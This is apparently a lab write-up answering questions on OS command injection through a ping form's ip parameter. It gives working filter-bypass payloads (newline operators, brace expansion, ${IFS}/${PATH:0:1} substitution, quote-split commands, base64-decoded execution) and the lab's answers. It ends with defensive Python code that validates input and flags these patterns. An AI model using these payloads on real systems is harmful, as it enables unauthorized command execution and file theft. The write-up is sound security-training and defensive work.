Questions
Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?
Line 17
Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
Answer: |
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
Ans: ip=127.0.0.1%0a{ls,-la}, 1613
Use what you learned in this section to find the name of the user in the '/home' folder. What user did you find?
%0a{ls,-la,${PATH:0:1},${IFS}home} shows ls -la / but it does not show what's inside /home.
Let's try and modify the payload further.
ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home}
Ans: 1nj3c70r
Use what you learned in this section to find the content of flag.txt in the home folder of the user you previously found.
ip=127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt} is interpreted by the shell as ip=127.0.0.1\n cat /home/1nj3c70r/flag.txt
The single quotes inside c'a't are there to bypass the filter.
Putting cat /home/1nj3c70r/flag.txt inside { } is also there to bypass the filter.
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
We could just as well base64-encode cat /flag.txt or cat /etc/passwd, but to answer the question, below is the command injection we want to execute after the IP address field.
bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
So the final payload is: ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) (the %09, a tab, stands in for the space between base64 and -d)
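As an added example (not from the lab or this write-up), here is the defender's side of the payloads above: an allow-list validator for the ip parameter, an argv builder that never hands the value to a shell, and a detector that flags the obfuscation patterns used in this section (newline, brace expansion, ${IFS}/${PATH:0:1}, quote-split words, base64 -d) after URL-decoding. Function names and the indicator table are my own assumptions, not the lab's code.

```python
import ipaddress
import re
from urllib.parse import unquote

# Indicators taken from the payloads discussed above, matched on the
# URL-decoded value (so %0a becomes "\n" and %09 becomes a tab).
INDICATORS = {
    "newline_or_operator": re.compile(r"[\n;&|`$]"),
    "brace_expansion": re.compile(r"\{[^}]*,[^}]*\}"),      # {ls,-la,...}
    "ifs_or_path_slice": re.compile(r"\$\{(IFS|PATH:0:1)\}"),  # ${IFS} / ${PATH:0:1}
    "quote_split_word": re.compile(r"[a-z]'[a-z]'[a-z]"),   # c'a't
    "base64_decode": re.compile(r"base64\s*-d"),            # base64 -d, base64<tab>-d
}


def detect_injection_indicators(raw):
    """Return the names of the indicators present in the decoded value (for logging/alerting)."""
    decoded = unquote(raw)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def validate_ip(raw):
    """Allow-list check: the whole decoded value must parse as an IP address.

    No blacklist of characters is involved, so none of the filter bypasses
    above help: a trailing newline, a brace or a $ makes parsing fail.
    """
    try:
        return str(ipaddress.ip_address(unquote(raw)))
    except ValueError as exc:
        raise ValueError("rejected ip parameter: %r" % raw) from exc


def build_ping_command(raw):
    """argv list for subprocess.run(argv, shell=False): the OS never parses operators."""
    return ["ping", "-c", "1", validate_ip(raw)]
```

The constructed payloads from this write-up all fail validate_ip and light up several indicators, while a plain address passes with none.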